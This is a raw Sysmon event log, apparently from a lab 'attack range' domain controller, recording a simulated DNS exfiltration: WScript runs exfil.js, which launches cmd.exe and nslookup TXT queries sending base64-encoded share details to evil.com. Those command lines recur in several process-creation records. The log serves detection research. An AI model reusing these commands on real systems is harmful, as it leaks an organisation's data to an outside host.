14:16:27.253{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.253{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.253{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.253{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.253{2E1864BB-17A1-629A-783D-000000005F02}55525860C:\Windows\System32\WScript.exe{2E1864BB-17BB-629A-F33F-000000005F02}7584C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.255{2E1864BB-17BB-629A-F33F-000000005F02}7584C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsjo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.238{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljuuiv.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.222{2E1864BB-17BB-629A-F13F-000000005F02}79406208C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-F23F-000000005F02}7508C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.206{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.206{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.206{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-F23F-000000005F02}7508C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.206{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.206{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.206{2E1864BB-17BB-629A-F03F-000000005F02}65603364C:\Windows\system32\cmd.exe{2E1864BB-17BB-629A-F23F-000000005F02}7508C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.219{2E1864BB-17BB-629A-F23F-000000005F02}7508C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BB-629A-F03F-000000005F02}6560C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljuuiv.tmp 2>&1 10341000x8000000000000000199136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.184{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-F13F-000000005F02}7940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.184{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-F13F-000000005F02}7940C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.184{2E1864BB-17BB-629A-F13F-000000005F02}79406208C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-F03F-000000005F02}6560C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.169{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-F13F-000000005F02}7940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.169{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.169{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-F03F-000000005F02}6560C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.169{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.169{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.169{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.169{2E1864BB-17A1-629A-783D-000000005F02}55527840C:\Windows\System32\WScript.exe{2E1864BB-17BB-629A-F03F-000000005F02}6560C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.174{2E1864BB-17BB-629A-F03F-000000005F02}6560C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljuuiv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.169{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrsc.tmpMD5=88CB44002509C6BB2D4BC0ADC4A5E028,SHA256=FA57CD8CDA118516C9A4FB97A60BCAFFDFC289CB501CF1DABE54CCC933EB8213,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.122{2E1864BB-17BB-629A-EE3F-000000005F02}37647772C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-EF3F-000000005F02}8104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.772{00000000-0000-0000-0000-000000000000}4832<unknown process>-udptruefalse127.0.0.1-52571-false127.0.0.1-53domain 354300x8000000000000000199122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.772{00000000-0000-0000-0000-000000000000}4832<unknown process>-udpfalsefalse127.0.0.1-52570-false127.0.0.1-53domain 354300x8000000000000000199121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.772{00000000-0000-0000-0000-000000000000}4832<unknown process>-udptruefalse127.0.0.1-52570-false127.0.0.1-53domain 354300x8000000000000000199120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.771{00000000-0000-0000-0000-000000000000}4832<unknown process>-udpfalsefalse127.0.0.1-52569-false127.0.0.1-53domain 10341000x8000000000000000199119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.122{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 